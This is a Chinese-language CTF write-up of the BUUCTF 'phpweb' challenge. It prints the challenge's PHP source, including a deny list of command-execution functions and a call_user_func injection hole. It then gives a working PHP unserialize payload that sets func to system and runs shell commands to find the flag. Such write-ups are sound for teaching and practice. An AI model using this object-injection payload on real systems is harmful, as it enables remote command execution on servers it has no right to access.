BUUCTF | [網鼎杯 2020 朱雀組]phpweb
阿新 • • 發佈:2020-12-09
一道比較簡單的題,不過對PHP還是不夠熟悉
知識點
1.PHP date函式
PHP date() 函式用於對日期或時間進行格式化。 語法 date(format,timestamp) 引數 描述 format 必需。規定時間戳的格式。 timestamp 可選。規定時間戳。預設是當前時間和日期。 date() 函式的格式引數是必需的,它們規定如何格式化日期或時間。 下面列出了一些常用於日期的字元: d - 表示月裡的某天(01-31) m - 表示月(01-12) Y - 表示年(四位數) 1 - 表示周裡的某天 其他字元,比如 "/", "." 或 "-" 也可被插入字元中,以增加其他格式。
2.任意檔案讀取
3.PHP反序列化
題目
進入題目5s之後可以看到一個date函式的報錯資訊
這時候可以發現頁面中的表單在自動提交,提交的內容是date函式和date函式的引數,所以後端可能將傳送的資料作為函式和函式的引數執行
抓包攔截修改,用highlight_file讀取index.php,把css裡面的背景刪掉
<?php $disable_fun = array("exec","shell_exec","system","passthru","proc_open","show_source","phpinfo","popen","dl","eval","proc_terminate","touch","escapeshellcmd","escapeshellarg","assert","substr_replace","call_user_func_array","call_user_func","array_filter", "array_walk", "array_map","registregister_shutdown_function","register_tick_function","filter_var", "filter_var_array", "uasort", "uksort", "array_reduce","array_walk", "array_walk_recursive","pcntl_exec","fopen","fwrite","file_put_contents"); function gettime($func, $p) { $result = call_user_func($func, $p); $a= gettype($result); if ($a == "string") { return $result; } else {return "";} } class Test { var $p = "Y-m-d h:i:s a"; var $func = "date"; function __destruct() { if ($this->func != "") { echo gettime($this->func, $this->p); } } } $func = $_REQUEST["func"]; $p = $_REQUEST["p"]; if ($func != null) { $func = strtolower($func); if (!in_array($func,$disable_fun)) { echo gettime($func, $p); }else { die("Hacker..."); } } ?>
反序列化
waf裡面沒有過濾反序列化函式
而且程式碼裡面有一個__destruct(),容易想到用反序列化解決
<?php
class Test {
var $func = "system";
var $p = "ls /";
}
$a = new Test();
echo serialize($a);
?>
payload:func=unserialize&p=O:4:"Test":2:{s:4:"func";s:6:"system";s:1:"p";s:4:"ls /";}
之後改變引數即可,最後在/tmp/flagoefiu4r93找到flag